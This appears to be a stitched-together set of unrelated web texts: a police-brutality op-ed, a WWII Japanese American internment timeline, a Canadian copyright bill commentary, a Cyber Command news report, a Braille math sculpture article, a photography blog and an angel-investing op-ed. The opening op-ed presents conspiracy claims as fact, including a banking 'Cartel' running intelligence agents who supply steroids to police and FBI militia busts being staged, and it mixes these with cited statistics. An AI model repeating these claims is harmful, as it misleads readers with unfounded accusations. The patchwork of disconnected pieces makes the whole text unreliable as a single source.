The report stated : “ Police abuse remains one of the most serious and divisive human rights violations in the United States .
The excessive use of force by police officers , including unjustified shootings , severe beatings , fatal chokings , and rough treatment , persists because overwhelming barriers to accountability make it possible for officers who commit human rights violations to escape due punishment and often repeat their offenses .
Police or public officials greet each new report of brutality with denials or explain the act was an aberration , while the administration and criminal systems that should deter these abuses by holding officers accountable instead virtually guarantee them impunity . ”
The extent of rampant and savage police behavior has , to date , been largely hidden by the Cartel ’s corporate media , but no more .
Now that the Cartel ’s intelligence services has its Praetorian Guard ( bodyguards used by Roman emperors ) in place , we ’ll be hearing more and more about what bad asses cops are .
After all , a harsh and tyrannical government is subject to creating great dissension in the general public , and there must be the means to control them .
The Monetary / Banking Cartel cannot steal trillions of dollars from the American people , and then take it for themselves , leaving us impoverished , without creating hard feelings .
But , the public knowledge about bad - assed cops will convince most people to keep their hard feelings to themselves .
And those who get too vocal about their feelings will be deemed terrorists and dealt with by militarized cops anxious to brutalize , if not kill , anyone , as long as they think they can get away with it .
And they have been getting away with it , as has been assured them by intelligence agents , who have been inserted into local police departments .
These agents have directed our police along the “ police versus the people ” lines with secret training videos , manuals , and directives , all part of the federal funding unknowing Americans pay for , resulting in the obvious alienation of their local police , who should be serving and protecting them .
So brainwashed have become many of our police personnel that they actually believe there are many , large , heavily armed , militia groups throughout the US , even in the super surveillance state that America has become .
Someone , please ask these diluted cops how could a group of hotheads secretly meet and train with rifles , automatic weapons , or much less train with bombs , hand grenades , tanks , armored personnel carriers , artillery , and the like and get away with it .
Would not such training make a bit of noise that somebody would report ?
Please understand , when you hear of the FBI busting up a “ militia ” group , it was probably a low - keyed outfit run by federal black intelligence operatives , put together to make the police and public believe such militias actually exist .
Another important issue that has been largely kept out of the media , has been the pressure brought to bear on local police departments , by the Civil Rights Division of the Justice Department to abandon “ cognitive ” entrance exams for police applicants .
Cities that do not drop cognitive exams are often sued by the US Justice Department , under the pretense of “ racial diversity . ”
Cognitive entrance exams were based on intelligence and reasoning abilities , which tested one ’s reading and writing skills .
Today , many police applicants only have to have scored about as well as the bottom one percent of what police applicants had to score 20 years ago to pass .
Now you ’ll know why that policeman who gave you a ticket seemed as dense as a box of rocks .
Once the Cartel had enough stupid cops , they needed something to keep them agitated ; and , pickling them in testosterone , caused by anabolic steroids , would do the trick .
After all , do n’t cops need to be bigger , badder , and brawnier than the bad guys ?
But what if cops become bad guys themselves ?
If so , then adding steroids to the mix , producing legions of cops in fits of ‘ roid rage , could be very bad for the American public .
Dr. Harrison Pope , Harvard ’s steroid specialist and author of ” The Adonis Complex ” has said , ” An intense ‘ roid rush can impair your judgment and inspire all manner of reckless behavior .
You could have someone who ’s not particularly aggressive , who has no history of psychiatric disorders , and he goes on steroids and has a Jekyll - and - Hyde personality change .
And , of course a police officer in that situation would be quite dangerous . ”
How many cops are on the juice ?
“ I ’ve heard of many , many accounts of officers taking steroids , ” said Dr. Pope .
“ But , it ’s impossible to put a number on it .
Even if I got a federal grant to study this , I would n’t be able to get that number , because of the veil of secrecy . ”
Dr. Larry Gaines , chairman of the criminal justice department at California State University said , “ We do n’t have a sense of the scope of the problem [ cops on ‘ roids ] .
And it is a problem , because of the potential for violence . ”
Also , there ’s strong correlation between police officers on steroids and those cops who deal in other drugs on the street .
What starts out with the illegal gateway drug of steroids can easily move onto dealing in pot , coke , Ecstasy and other drugs .
These juicers in blue are an open secret within the secretive subculture of the intelligence world , the operatives who are making many steroids available to many cops .
Otherwise , the growing problem of cops on ‘ roids is being kept quiet .
Few police departments test officers for steroid use , and of course our national leaders are too busy investigating steroid use among baseball players to mandate steroid tests for all – or any – of our 17,000 law enforcement departments and organizations .
Little George Bush II announced in a State of the Union address in January of 2004 that the use of steroids in sports is dangerous , “ So tonight I call on team owners , union representatives , coaches , and players to take the lead , to send the right signal , to get tough , and to get rid of steroids now . ”
Bush ’s ridiculous distraction from our real problems was followed by thunderous applause from senators and congress - persons , none of whom dared to mention that intelligence operatives play a significant role in ensuring many police officers use ‘ roids and rage against us , the American people .
Little Bush was a inter-national embarrassment , but our US congress is an utter disgrace to America , with bogus , titular leaders like republican Senator John McCain and democratic Congressman Henry Waxman leading us on the path to oblivion , with their pretended concern over performance enhancing drugs in sports .
Jay Leno said , “ Congress is investigating steroid use in baseball .
Apparently we ’ve cured cancer and all other problems of the world so now we ’re starting on this one . ”
Give a cop on steroids a stun - gun or taser and you have a potentially dangerous combination .
Today , a totally innocent American can be tasered with 50,000 to 150,000 volts of electricity by simply verbally disagreeing with a police officer .
Tasers , known as “ electronic immobilization devices , ” deliver a long lasting electrical shock up to 450 times stronger than the current of a household ’s electrical socket .
It ’s been reported that being hit with a taser is much like being hit full force in the head with a baseball bat .
Tasers disrupt one ’s central nervous system , causing severe , involuntary muscle contractions that immobilize and can stop one ’s heart unto death .
Already there have been about 400 people killed by tasers .
Killing unnamed civilians has become , with some , a macho thing to do , especially with some congenitally disadvantaged cops , who seem to have special immunity to murder .
The Internet is loaded with videos of cops tasering old ladies , children , and people who offered no resistance to arrest .
Police are now , however , prohibiting video taping of their thuggery , while they video us with impunity .
It seems evident that some people want us to fear government .
The great Thomas Jefferson wrote , “ When governments fear the people there is liberty .
When the people fear the government there is tyranny . ”
But still , there are those who fear our government and police , but insist they live in a protected democracy .
And in the immoral words of Pogo , “ We ’ve found the enemy and he is us . ”
Federal and state governments carefully avoid keeping accurate statistics on police brutality or even officer involved sexual misconduct ; but fortunately , the brave National Police Misconduct Statistics and Report Project ( NPMSRP ) does its best to keep abreast of the constant and burgeoning outbreaks of gross police misconduct .
There is , however , an indeterminate amount of under - reporting that exists within NPMSRP ’s statistics , since the Cartel ’s corporate media does not report on every complaint of police misconduct , nor on every lawsuit filed .
Moreover , it can be assumed that many victims of police brutality have chosen to remain silent .
Still the statistics reported by NPMSRP should prove to anyone , America has , in deed , become a police state ; and , only with more Americans becoming aware of our precarious situation do we have a chance of reversing what we have allowed to happen .
It would be foolish to expect that any facet of our federal government to alert us to the extent of police brutality .
The one and only such report that I ’m aware of is about a decade old , and was based on the data voluntarily given by only five percent of US police departments .
During the first three months of 2010 , alone , NPMSRP cites 1,160 unique reports of police brutality or other misconducts , which includes 1,410 separate police officers , and 1,446 victims , with 52 civilian deaths .
During the same three month period , 77 police chiefs and sheriffs were named in misconduct reports .
From the thousands of police brutality and misconduct reports from 2009 , listed below are some of those crimes .
1. Choking children ,
2. Child molestation ,
3 . Shooting chain - up dogs and scared cats ,
4 . Beating people in wheelchairs ,
5 . Tastering children and old people ,
6. Sexual assaults on women ,
7 . Breaking into private homes and stealing ,
8 . Fleeing hit and run accidents ,
9. Getting DUIs .
10 .
Destroying private home with tear gas shells ,
11 . Perjury and tampering with evidence ,
12 . Causing unnecessary brain damage ,
13 . Ignoring 911 calls ,
14 . Driving on suspended licenses ,
15 . Sodomy and corruption of minors ,
16 . Stealing money , drugs , and guns ,
17 . Drug addictions ,
18 . Illegal steroid use ,
19 .
Having sex in patrol cars ,
20 . Extortion of cash at traffic stops ,
21 . Wife beatings ,
22 . Beating hand - cuffed teenagers ,
23 . Stealing drugs held as evidence ,
24 . Running into pedestrians with patrol cars ,
25 . Stalking women ,
26 . Tasering unconscious diabetic 11 times .
Until we get a president and congress that will do their jobs and take back control of “ our ” intelligence services , from the foreign and private International Monetary / Banking Cartel , the US government will continue to force on us a police state as tyrannical as was those of communistic Russia or Nazi Germany .
Instead , “ our leaders ” consider every American to be a potential terrorist , while these very same leaders terrorize us with warrantless spying of our emails , postal mail , telephone calls .
They beat us , taser us , and falsely arrest us , while pretending to protect us from the very terrorists they ’ve created .
And , unless more of us wake up to the tyranny afoot , we – the American people – are , indeed , the problem .
J. Speer - Williams
Jsw4@mac.com
WWII INTERNMENT TIMELINE
August 18 , 1941
In a letter to President Roosevelt , Representative John Dingell of Michigan suggests incarcerating 10,000 Hawaiian Japanese Americans as hostages to ensure " good behavior " on the part of Japan .
November 12 , 1941
Fifteen Japanese American businessmen and community leaders in Los Angeles Little Tokyo are picked up in an F.B.I. raid .
A spokesman for the Central Japanese Association states : " We teach the fundamental principles of America and the high ideals of American democracy .
We want to live here in peace and harmony .
Our people are 100 % loyal to America . "
December 7 , 1941
The attack on Pearl Harbor .
Local authorities and the F.B.I. begin to round up the leadership of the Japanese American communities .
Within 48 hours , 1,291 Issei are in custody .
These men are held under no formal charges and family members are forbidden from seeing them .
Most would spend the war years in enemy alien internment camps run by the Justice Department .
February 19 , 1942
President Roosevelt signs Executive Order 9066 which allows military authorities to exclude anyone from anywhere without trial or hearings .
Though the subject of only limited interest at the time , this order set the stage for the entire forced removal and incarceration of Japanese Americans .
February 25 , 1942
The Navy informs Japanese American residents of Terminal Island near Los Angeles Harbor that they must leave in 48 hours .
They are the first group to be removed en masse .
February 27 , 1942 .
Idaho Governor Chase Clark tells a congressional committee in Seattle that Japanese would be welcome in Idaho only if they were in " concentration camps under military guard . "
Some credit Clark with the conception of what was to become a true scenario .
March 2 , 1942
Gen. John L. DeWitt issues Public Proclamation No. 1 which creates Military Areas Nos. 1 and 2 . Military Area No. 1 includes the western portion of California , Oregon and Washington , and part of Arizona while Military Area No. 2 includes the rest of these states .
The proclamation also hints that people might be excluded from Military Area No. 1 .
March 18 , 1942
The president signs Executive Order 9102 establishing the War Relocation Authority ( WRA ) with Milton Eisenhower as director .
It is allocated $ 5.5 million .
March 21 , 1942
The first advance groups of Japanese American " volunteers " arrive at Manzanar , CA .
The WRA would take over on June 1 and transform it into a " relocation center . "
March 24 , 1942
The first Civilian Exclusion Order issued by the Army is issued for the Bainbridge Island area near Seattle .
The forty - five families there are given one week to prepare .
By the end of October , 108 exclusion orders would be issued , and all Japanese Americans in Military Area No. 1 and the California portion of No. 2 would be incarcerated .
March 28 , 1942
Minoru Yasui walks into a Portland police station at 11:20 p.m. to present himself for arrest in order to test the curfew regulations in court .
May 1 , 1942
Having " voluntarily resettled " in Denver , Nisei journalist James Omura writes a letter to a Washington law firm inquiring about retaining their services to seek legal action against the government for violations of civil and constitutional rights and seeking restitution for economic losses .
He was unable to afford the $ 3,500 fee required to begin proceedings .
May 13 , 1942
Forty - five - year - old Ichiro Shimoda , a Los Angeles gardener , is shot to death by guards while trying to escape from Fort Still ( Oklahoma ) internment camp .
The victim was seriously mentally ill , having attempted suicide twice since being picked up on December 7 .
He is shot despite the guards ' knowledge of his mental state .
May 16 , 1942
Hikoji Takeuchi , a Nisei , is shot by a guard at Manzanar .
The guard claims that he shouted at Takeuchi and that Takeuchi began to run away from him .
Takeuchi claims he was collecting scrap lumber and did n't hear the guard shout .
His wounds indicate that he was shot in the front .
Though seriously injured , he eventually recovered .
May 29 , 1942
Largely organized by Quaker leader Clarence E. Pickett , the National Japanese - American Student Relocation Council is formed in Philadelphia with University of Washington Dean Robert W. O'Brien as director .
By war 's end , 4,300 Nisei would be in college .
June 1942
The movie " Little Tokyo , U.S.A. " is released by Twentieth Century Fox .
In it , the Japanese American community is portrayed as a " vast army of volunteer spies " and " blind worshippers of their Emperor , " as described in the film 's voice - over prologue .
June 17 , 1942
Milton Eisenhower resigns as WRA director .
Dillon Myer is appointed to replace him .
July , 27 1942
Two Issei -- Brawley , CA farmer Toshiro Kobata and San Pedro fisherman Hirota Isomura -- are shot to death by camp guards at Lourdsburg , New Mexico enemy alien internment camp .
The men had allegedly been trying to escape .
It would later be reported , however , that upon their arrival to the camp , the men had been too ill to walk from the train station to the camp gate .
August 4 , 1942
A routine search for contraband at the Santa Anita " Assembly Center " turns into a " riot . "
Eager military personnel had become overzealous and abusive which , along with the failure of several attempts to reach the camp 's internal security chief , triggers mass unrest , crowd formation , and the harassing of the searchers .
Military police with tanks and machine guns quickly end the incident .
The " overzealous " military personnel are later replaced .
August 10 , 1942
The first inmates arrive at Minidoka , Idaho .
August 12 , 1942
The first 292 inmates arrive at Heart Mountain , Wyoming .
August 27 , 1942
The first inmates arrive at Granada , or Amache , Colorado .
September 11 , 1942
The first inmates arrive at Central Utah , or Topaz .
September 18 , 1942
The first inmates arrive at Rohwer , Arkansas .
October 20 , 1942
President Roosevelt calls the " relocation centers " " concentration camps " at a press conference .
The WRA had consistently denied that the term " concentration camps " accurately described the camps .
November 14 , 1942
An attack on a man widely perceived as an informer results in the arrest of two popular inmates at Poston .
This incident soon mushrooms into a mass strike .
December 5 , 1942
Fred Tayama is attacked and seriously injured by a group of inmates at Manzanar .
The arrest of the popular Harry Ueno for the crime triggers a mass uprising .
December 10 , 1942
The WRA establishes a prison at Moab , Utah for recalcitrant inmates .
February 1 , 1943
The 442nd Regimental Combat Team is activated , made up entirely of Japanese Americans .
April 11 , 1943
James Hatsuki Wakasa , a sixty - three - year - old chef , is shot to death by a sentry at Heart Mountain camp while allegedly trying to escape through a fence .
It is later determined that Wakasa had been inside the fence and facing the sentry when shot .
The sentry would stand a general court - martial on April 28 at Fort Douglas , Utah and be found " not guilty . "
April 13 , 1943
" A Jap 's a Jap .
There is no way to determine their loyalty ..
This coast is too vulnerable .
No Jap should come back to this coast except on a permit from my office . "
Gereral John L. DeWitt , head , Western Defense Command ; before the House Naval Affairs Subcommittee .
June 21 , 1943
The United States Supreme Court rules on the Hirabayashi and Yasui cases , upholding the constitutionality of the curfew and exclusion orders .
September 13 , 1943
The realignment of Tule Lake as a camp for " dissenters " begins .
After the loyalty questionnaire episode , " loyal " internees begin to depart to other camps .
Five days later , " disloyal " internees from other camps begin to arrive at Tule Lake .
November 4 , 1943
The Tule Lake uprising caps a month of strife .
Tension had been high since the administration had fired 43 coal workers involved in a labor dispute on October 7 .
January 14 , 1944
Nisei eligibility for the draft is restored .
The reaction to this announcement in the camps would be mixed .
January 26 , 1944
Spurred by the announcement of the draft a few days before , 300 people attend a public meeting at Heart Mountain camp .
Here , the Fair Play Committee is formally organized to support draft resistance .
March 20 , 1944
Forty - three Japanese American soldiers are arrested for refusing to participate in combat training at Fort McClellan , Alabama , as a protest of treatment of their families in U.S. camps .
Eventually , 106 are arrested for their refusal .
Twenty - one are convicted and serve prison time before being paroled in 1946 .
May 10 , 1944
A Federal Grand Jury issues indictments abgainst 63 Heart Mountain draft resistors .
The 63 are found guilty and sentenced to jail terms on June 26 .
They would be granted a pardon on December 24 , 1947 .
May 24 , 1944
Shoichi James Okamoto is shot to death at Tule Lake by a guard after stopping a construction truck at the main gate for permission to pass .
Private Bernard Goe , the guard , would be acquitted after being fined a dollar for " unauthorized use of government property " -- a bullet .
June 30 , 1944
Jerome becomes the first camp to close when the last inmates are transferred to Rohwer .
July 21 , 1944
Seven members of the Heart Mountain Fair Play Committee are arrested , along with journalist James Omura .
Their trial for " unlawful conspiracy to counsel , aid and abet violators of the draft " begins on October 23 .
All but Omura would eventually be found guilty .
October 27 - 30 , 1944
The 442nd Regimental Combat Team rescues an American battalion which had been cut off and surrounded by the enemy .
Eight hundred casualties are suffered by the 442nd to rescue 211 men .
After this rescue , the 442nd is ordered to keep advancing in the forest ; they would push ahead without relief or rest until November 9 .
December 18 , 1944
The Supreme Court decides that Fred Toyosaburo Korematsu was indeed guilty of remaining in a military area contrary to the exclusion order .
This case challenged the constitutionality of the entire exclusion process .
January 2 , 1945
Restrictions preventing resettlement on the West Coast are removed , although many exceptions continue to exist .
A few carefully screened Japanese Americans had returned to the coast in late 1944 .
January 8 , 1945
The packing shed of the Doi family is burned and dynamited and shots are fired into their home .
The family had been the first to return to California from Amache and the first to return to Placer County , having arrived three days earlier .
Although several men are arrested and confess to the acts , all would be acquitted .
Some 30 similar incidents would greet other Japanese Americans returning to the West Coast between January and June .
May 7 , 1945
The surrender of Germany ends the war in Europe .
August 6 , 1945
The atomic bomb is dropped on Hiroshima .
Three days later , a second bomb is dropped on Nagasaki .
The war in the Pacific would end on August 14 .
March 20 , 1946
Tule Lake closes , culminating " an incrediblle mass evacuation in reverse . "
In the month prior to the closing , some 5,000 internees had to be moved , many of whom were elderly , impoverished , or mentally ill and with no place to go .
July 15 , 1946
The 442nd Regimental Combat Team is received on the White House lawn by President Truman .
" You fought not only the enemy but you fought prejudice -- and you have won , " remarks the president .
June 30 , 1947
U.S. District Judge Louis E. Goodman orders that the petitioners in Wayne Collins ' suit of December 13 , 1945 be released ; native - born American citizens could not be converted to enemy aliens and could not be imprisoned or sent to Japan on the basis of renunciation .
Three hundred and two persons are finally released from Crystal City , Texas and Seabrook Farms , New Jersey on September 6 , 1947 .
July 2 , 1948
President Truman signs the Japanese American Evacuation Claims Act , a measure to compensate Japanese Americans for certain economic losses attributable to their forced evacuation .
Although some $ 28 million was to be paid out through provision of the act , it would be largely ineffective even on the limited scope in which it operated .
July 10 , 1970
A resolution is announced by the Japanese American Citizen League 's Northern California - Western Nevada District Council calling for reparations for the World War II incarceration of Japanese Americans .
This resolution would have the JACL seek a bill in Congress awarding individual compensation on a per diem basis , tax - free .
November 28 , 1979
Representative Mike Lowry ( D - WA ) introduces the World War II Japanese - American Human Rights Violations Act ( H.R. 5977 ) into Congress .
This NCJAR - sponsored bill is largely based on research done by ex-members of the Seattle JACL chapter .
It proposes direct payments of $ 15,000 per victim plus an addtional $ 15 per day interned .
Given the choice between this bill and the JACL - supported study commission bill introduced two months earlier , Congress opts for the latter .
July 14 , 1981
The Commission on Wartime Relocation and Internment of Civilians ( CWRIC ) holds a public hearing in Washington , D.C. as part of its investigation into the internment of Japanese Americans during World War II .
Similar hearings would be held in many other cities throughout the rest of 1981 .
The emotional testimony by more than 750 Japanese American witnesses about their wartime experiences would prove cathartic for the community and a turning point in the redress movement .
June 16 , 1983
The CWRIC issues its formal recommendations to Congress concerning redress for Japanese Americans interned during World War II .
They include the call for individual payments of $ 20,000 to each of those who spent time in the concentration camps and are still alive .
August 10 , 1988
H.R. 442 is signed into law by President Ronald Reagan .
It provides for individual payments of $ 20,000 to each surviving internee and a $ 1.25 billion education fund among other provisions .
October 9 , 1990
The first nine redress payments are made at a Washington , D.C. ceremony .
One - hundred - seven - year - old Rev. Mamoru Eto of Los Angeles is the first to receive his check .
Timeline excerpted from JAPANESE AMERICAN NATIONAL MUSEUM online :
http://www.lausd.k12.ca.us/janm/
Media reports last week indicated that the government plans to introduce its long - awaited copyright reform bill within the next few days .
The bill is sure to spark widespread debate since all Canadians -- whether consumers , creators , businesses , or educators -- have a significant stake in the outcome .
Will Copyright Bill Be Obsolete on Arrival ?
read more
Announcements , Events & more from Tyee and select partners Hurrah !
Tyee Reporter Katie Hyslop Celebrates 10 - Year Tyeeversary
She ’s covered education , youth and housing issues for a decade now , and we ’re lucky to have her .
The internal dynamics that led to the bill are by now fairly well known .
Industry Minister Tony Clement , emboldened by last summer 's copyright consultation that generated unprecedented public participation , argued for a forward - looking , technology neutral bill with flexibility as a core principle .
Canadian Heritage Minister James Moore advocated for a U.S. - style protectionist approach , with priority given to digital locks that can be used to limit copying , access , and marketplace competition .
With the active support of Prime Minister Stephen Harper , Moore won the fight over digital locks and the new bill will feature provisions certain to please the U.S. government and lobby groups .
Yet the bill will include far more than just tough legal protection for digital locks .
The big issues
Here is an unofficial user 's guide to the new legislation that focuses on three key issues -- fair dealing , Internet provider liability , and digital locks ( Internet downloading is unlikely to figure prominently in the bill ) .
Fair dealing .
First , the bill is certain to include a handful of changes to the current fair dealing provision .
The Supreme Court of Canada has ruled that Canada 's fair dealing provision -- which is similar though not identical to fair use in the U.S. -- must be interpreted in a broad and liberal manner .
Yet the law currently includes a limited number of categories ( research , private study , criticism , news reporting , and review ) that renders many everyday activities illegal .
During the copyright consultation , many Canadians called for the introduction of a flexible fair dealing provision that would legalize many common activities .
This is an issue that touches everyone .
Creators would benefit from a parody and satire exception .
Consumers would benefit from exceptions for recording television shows or changing the format of content they have purchased .
Educators would benefit from exceptions to cover teaching activities and distance education .
Sources say the government has rejected the flexible fair dealing approach , but that new exceptions will make their way into the bill .
The scope of the exceptions -- the last bill contained 12 conditions in order to legally record a television show -- will go a long way to determining whether the bill tries to strike a balance between competing copyright interests .
Internet provider liability .
Second , the bill will address the responsibility of Internet intermediaries such as Internet providers and search engines for the activities of their users and subscribers .
The past two copyright bills both struck a reasonable compromise by adopting an approach that gave copyright holders the ability to warn users about alleged infringements , but protected the privacy and free speech rights of the public .
The bill will likely adopt the same system once again , which should garner support from across the spectrum .
Digital locks .
Third , the bill will include digital lock provisions , known as anti-circumvention rules .
These rules , which will allow Canada to implement international copyright treaties it signed over 10 years ago , was the most - discussed issue during the consultation .
Thousands of Canadians argued that Canada should adopt a flexible implementation that renders it illegal to " pick a digital lock " for the purposes of copyright infringement , but preserves the right to do so for legal purposes .
Sources say the government has rejected the flexible approach in favour of the U.S. - style ban on circumvention ( subject to a handful of limited exceptions ) .
If true , the problem with the approach is that it undermines both the new and existing exceptions .
For millions of Canadians , that means that their user rights will be lost whenever a digital lock is present including for CDs , DVDs , electronic books , and many other devices .
In the process , the balance will tilt strongly away from consumers and their property rights over their own purchases .
The US military has appointed its first senior general to direct cyber warfare – despite fears that the move marks another stage in the militarisation of cyberspace .
The newly promoted four - star general , Keith Alexander , takes charge of the Pentagon 's ambitious and controversial new Cyber Command , designed to conduct virtual combat across the world 's computer networks .
He was appointed on Friday afternoon in a low - key ceremony at Fort Meade , in Maryland .
The creation of America 's most senior cyber warrior comes just days after the US air force disclosed that some 30,000 of its troops had been re-assigned from technical support " to the frontlines of cyber warfare " .
The creation of Cyber Command is in response to increasing anxiety over the vulnerability of the US 's military and other networks to a cyber attack .
James Miller , the deputy under - secretary of defence for policy , has hinted that the US might consider a conventional military response to certain kinds of online attack .
Although Alexander pledged during his confirmation hearings before the Senate committee on armed services last month that Cyber Command would not contribute to the militarisation of cyberspace , the committee 's chairman , Senator Carl Levin expressed concern that both Pentagon doctrine , and the legal framework for online operations , had failed to keep pace with rapid advances in cyber warfare .
In particular Levin voiced concern that US cyber operations to combat online threats to the US , routed through neutral third countries , " could have broad and damaging consequences " to wider American interests .
Plans for Cyber Command were originally conceived under President George W Bush .
Since taking office Barack Obama has embraced the theme of cyber security , describing it last year as " one of the most serious economic and national security challenges [ the US faces ] as a nation " .
During his confirmation hearing , Alexander said that the Pentagon 's networks were being targeted by " hundreds of thousands of probes every day " adding that he had " been alarmed by the increase , especially in this year " .
Cyber warfare has increased rapidly in scale and sophistication with China accused of being at the forefront of prominent recent attacks , including the targeting of Google and 20 other companies last year as well as " Titan Rain " in 2003 – a series of coordinated attacks on US networks .
Russian and North Korean hackers have also been accused of large - scale attacks .
Moscow was accused of being behind a massive cyber assault on Estonia in 2007 – the second largest cyber warfare operation ever conducted .
While Alexander has tried to play down the offensive aspects of his command , the Pentagon has been more explicit , stating on Friday that Cyber Command will " direct the operations and defence of specified Department of Defense information networks [ involving some 90,000 military personnel ] and prepare to , when directed , conduct full - spectrum military cyberspace operations in order to enable actions in all domains , [ to ] ensure US allied freedom of action in cyberspace and deny the same to our adversaries . "
The complex issues facing Cyber Command were thrown into relief earlier this year when the Washington Post revealed details of a so - called " dot- mil " operation by Fort Meade 's cyber warfare unit , backed by Alexander , to shut down a " honeytrap website " set up by the Saudis and the CIA to target Islamist extremists planning attacks in Saudi Arabia .
The Pentagon became convinced that the forum was being used to co-ordinate the entry of jihadi fighters into Iraq .
Despite the strong objections of the CIA , the site was attacked by the Fort Meade cyber warfare unit .
As a result , some 300 other servers in the Saudi kingdom , Germany and Texas also were inadvertently shut down .
Of equally concern to those who had opposed the operation , it was conducted without informing key members of the Saudi royal family , who were reported to be " furious " that a counter - terrorism tool had been shut down .
The issue of cyber warfare – and how to combat it – has become an increasingly fraught one .
The need to have electronic warfare capabilities , say those who support them , has been proven repeatedly by the apparent success of hostile attacks on government networks , including last year 's massive denial of service assault on networks in both the US and Korea .
Last year , hackers also accessed large amounts of sensitive data concerning the Pentagon 's Joint Strike Fighter programme .
The difficulties facing the new command were underlined in March by former CIA director Michael V Hayden , who said that the Saudi operation had demonstrated that cyber warfare techniques were evolving so rapidly that they were now outpacing the government 's ability to develop coherent policies to guide its use .
" Cyber was moving so fast that we were always in danger of building up precedent before we built up policy , " Hayden said .
Mastering mathematics can be daunting for many children , but researchers have found that children with visual impairments face disproportionate challenges learning math , and by the time they reach the college level , they are significantly under - represented in science , technology , mathematics and engineering disciplines .
Researchers at the University of Illinois are helping shape the futures of children with visual disabilities by creating innovative teaching tools that are expected to help the children learn mathematics more easily -- and perhaps multiply their career opportunities when they reach adulthood .
Nearly 5 million -- or one in 20 -- preschool - aged children and about 12.1 million children ages 6 - 17 have visual impairments , according to the Braille Institute .
Sheila Schneider , who is a senior and the first student who is legally blind to major in sculpture in the School of Art + Design within the College of Fine and Applied Arts at Illinois , is creating a series of small sculptures with mathematical equations imprinted on them in Braille that will be used to help children with visual impairments learn mathematics .
The equations will be written in Nemeth Code , a form of Braille used for mathematical and scientific symbols .
" The sculptures are organic forms that are designed to be hand - held by children around the ages of 7 - 10 , " said Deana McDonagh , a professor of industrial design and the lead investigator on the project .
" They 're designed from the viewpoint of a younger child . "
" They 're very engaging , fun educational tools , and when the children run their hands over them , they 'll realize that there are Braille equations embedded within the forms , " McDonagh said .
" We 're hoping that they 'll become mainstream educational tools . "
Traditionally , children with visual disabilities are taught to solve mathematical problems using abacuses , tools that may seem antiquated in today 's world and foster stigmatization , Schneider said .
advertisement
" We 're trying to bring the education of visually impaired children more up to date , rather than relying on staid methods of doing things , " Schneider said .
" We 're hoping to eliminate this idea that blind children have to learn math with an abacus because they can't see to write on a piece of paper .
We 're trying to eliminate the stigma and provide them with a method of engaging in and with math .
" We 're hoping that as they grow older , they 'll become more interested in careers in science , technology , engineering and mathematics fields . "
Schneider sculpted six models , each a few inches in diameter , from cubes of balsa foam .
The models are being translated into three - dimensional computer images to finalize the shapes and position the equations before the sculptures are cast from bronze , a durable material that can withstand extensive handling and occasionally being dropped .
" Where you and I might place the Braille equations is of no consequence , " McDonagh said .
" When children with visual impairments are handling the sculptures , and reading them with their fingertips , it 's got to make sense to them where we place the Braille in three - dimensional space . "
Once the sculptures have been cast , the next step will be to have children with visual impairments and their teachers use them in math instruction to assess the sculptures ' efficacy as teaching tools .
" The number of people with disabilities is on the increase , and our population and its needs are changing , " said McDonagh , whose research and teaching focuses on empathic product design , assistive technologies and disability issues . "
" We 're trying to use people 's different life experiences and respect that there are different ways of doing things , " McDonagh said .
" It 's an opportunity to bridge the gulf between the lived experience and science , mathematics and technology through sculpture . "
SPIEGEL Interview with Economist Nouriel Roubini ' We Will Have Even More Crises in the Future '
First came the real estate crisis .
Then the financial system melted down .
And now , skyrocketing public debt is threatening entire countries .
Star economist Nouriel Roubini tells SPIEGEL that more crises will come and go before world leaders agree on true reform .
He says breaking up huge banks would be a good place to start .
– May 12 , 2010
today I want to show you something completely different than my usual photos .
Like most of you I like to browse photos on flickr and admire very different photo styles .
Beside impressive HDR Landscape , I ’m personally very much inspired by well done portrait photos enhanced or created by means of artificial light sources .
It is interesting to enhance this raw image later in photoshop and give them a unique style .
There are some masters out there , that do incredible work to express the personality of a person or the character of a situation .
I would love to learn more in this area and have started therefore to buy one or two strobes and to “ copy some style ” .
This photo above is one of my first results in this area .
I was wondering how this photographer get this typical model style we know from advertising .
After some playing around with filters and lighting equipment I got to the result above .
I decided to show you both the original studio shot and the photoshop enhanced end result , so you can differentiate between lighting and photoshop .
Reminds me a bit on the Dove campaign for real beauty 😉
Hope you like it .
some technical infos for the lighting :
– white Background ( I did n’t had a flash left for illuminate this )
– silver reflector umbrella above the camera ( you can see it in the eye reflection )
– white reflector underneath the face hand hold by the model ( you see a little in the eyes )
Photoshop work
– normal tonemapping
– smoothing the skin with noiseware .
– increase symmetrie in the face ( ears , position of eyes , nose , skull in general )
– Increase the lips
– increase contrast in the eyes .
Emphaze the highlights there
– clone stamp the wrinkles ( you never see any wrinkles in advertising ;-(
All this small changes result in this advertising look .
Below you see a second example of a low - key photo .
Hope you like the post .
Any recommendations ?
All the best
Werner
Congress , listen up :
It ai n't broke , so do n't fix it .
Sen. Christopher Dodd Getty Images file Let 's say you 're a doctor , making $ 260,000 a year , with a nest egg of a half million bucks , safely invested , and a beautiful home worth $ 600,000 , and no mortgage !
You know an entrepreneur who 's invented a great new medical device — one you know is useful — and you want to invest $ 50,000 in her new company .
You think you 'll make money , the entrepreneur gets help starting a company , jobs are created , lives may be saved .
It 's good for America .
Everybody wins , right ?
Well , evidently Congress does n't think so .
Buried deep inside the gargantuan financial reform legislation now before Congress are some little - noticed provisions that are going to make it impossible for that doctor to invest , make it harder and more expensive for that inventor to start a company , and much , much harder for people like you and me to start a business .
So listen up — and then write your Congressperson .
That hypothetical doctor is a member of one of the most important groups in helping America create jobs and be competitive — angel investors .
Angels are private individuals who invest in new companies , providing critical start - up and early - stage expansion funding .
They 're the ones who provide the $ 25,000 or $ 250,000 that enable an entrepreneur to turn an idea into a job - creating reality .
Now , bear with me , because some of this is going to seem minor and technical , but let me explain how provisions in the Financial Reform bill can keep you from getting your next great business idea off the ground .
Here 's what Congress is currently proposed regarding angel investors and start - up funding in the legislation : • " Accredited investors " — Require investors to have a minimum net worth of $ 2.3 million or annual income of $ 450,000 — up from $ 1 million or $ 250,000 .
• SEC registration — Require start - ups to register with the Securities and Exchange Commission and be reviewed for 120 days before raising any money .
• State control — Eliminate the federal waiver and allow states to regulate these private offerings .
Now , these may not seem so bad , but here are the likely , real - world consequences for you and for me : 1 . You 'll have a MUCH harder time finding people to invest in your company .
Changes in the accredited investor rules will prohibit a huge percent of people from investing in start - ups or business expansion .
The Kauffman Foundation said it may eliminate 77 % of all angel investors .
Since the legislation was introduced , I 've talked to two people who now actively invest in start - ups — one a member of a well - known and highly respected angel investment group — who will not be eligible to invest in new companies if these provisions go through .
They are business and investment savvy , and they prefer putting their money in start - ups rather than the stock market .
Why should the federal government keep them from doing so ?
